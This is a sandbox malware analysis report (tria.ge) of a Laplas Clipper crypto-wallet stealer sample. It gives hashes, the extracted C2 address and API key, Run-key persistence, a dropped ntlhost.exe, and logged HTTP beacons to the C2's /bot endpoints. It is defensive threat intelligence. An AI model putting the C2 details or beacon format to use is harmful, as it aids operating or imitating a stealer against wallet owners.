Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

08439699.exe

windows7-x64

10

08439699.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    31s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    25/05/2023, 16:14 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    08439699.exe

  • Size

    4.0MB

  • MD5

    feccda803ece2e7a3b7e9798714ad47e

  • SHA1

    e97182adccf8a7692e6ad2614b0fb7fd3898a1a2

  • SHA256

    14529dca41abfea65abb51c84ec34ba0a951581586f98cef60213ae949a78320

  • SHA512

    dec5fd4d184772ca590333b2382706c6e5a7b5050f9ae98af813192e06500424870e8332a1406c763e5cc6d266ddd7e09280b6bf118392fa6edea6fab5843287

  • SSDEEP

    49152:jEjwvlIKv05z+UERnIcYmWjc3Cdh+5E9UFiqeb0/B1:RlhWzZ6hjEciqe

Score
10/10
laplasclipperpersistencestealer

Malware Config

Extracted

Family

laplas

C2

http://185.223.93.251

Attributes
  • api_key

    f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

    stealerclipperlaplas
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\08439699.exe
    "C:\Users\Admin\AppData\Local\Temp\08439699.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1592
    • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      2⤵
      • Executes dropped EXE
      PID:1532

Network

  • flag-nl
    GET
    http://185.223.93.251/bot/regex
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 25 May 2023 16:15:00 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 25 May 2023 16:15:00 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/regex
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 25 May 2023 16:16:06 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 25 May 2023 16:16:06 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/regex
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 25 May 2023 16:17:11 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 25 May 2023 16:17:12 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • 185.223.93.251:80
    http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin
    http
    ntlhost.exe
    1.6kB
     4.3kB
     15
    20

    HTTP Request

    GET http://185.223.93.251/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin

    HTTP Response

    200

    HTTP Request

    GET http://185.223.93.251/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin

    HTTP Response

    200

    HTTP Request

    GET http://185.223.93.251/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin

    HTTP Response

    200
No results found

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    Filesize

    782.0MB

    MD5

    d47b1121c27ff835a9f315720c32a1b2

    SHA1

    63b61c2fbd431b083953075f0e44493b43856324

    SHA256

    5904b02260cde3849b8892ff154ed0b58b1c7800c700b63bc79e3d16a849597d

    SHA512

    f216c008c3870fdc7ae66f38fbfc70a50d546e20803516454ae875154c65a508fa573f58e1a25bf03467226a405e51fb5b42055a31b8cc185df6fedad6670f18

    Download Submit

  • \Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    Filesize

    643.2MB

    MD5

    ab79fefff89222e8dd3598277adc0766

    SHA1

    0b1b4b49848e8ea7dd92fea80303a955f67ce07f

    SHA256

    4e6e19c8cd2bf70335555c82ec96416656e27edf021e220fb1bb6aab586c943d

    SHA512

    2984cc2641fa4f5e26e2767c30ee06fbeb8f222fdc3bade5be3df4cf37c10cd6f947a33cde7b9d05be8af9bad95d464c007509de9044d71d09f24c7e07a05835

    Download Submit

  • \Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    Filesize

    620.6MB

    MD5

    a1ed8bdca9f51338ea1ffd61e8a10884

    SHA1

    7366825e741502a16ea8963c5497f9fefecce77c

    SHA256

    4f9a0d135eef57cf21fd84bd56321417952fe7905159d92e41c91f3b34307df5

    SHA512

    dc878c7d347d114c6bf4cb07b5dbb7f0650a6752fddc93eb6ff5e3226e6936324f5620a4868df3d9af56673a7c8463f65af67da5eb100d8e016fbd7da799952e

    Download Submit

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.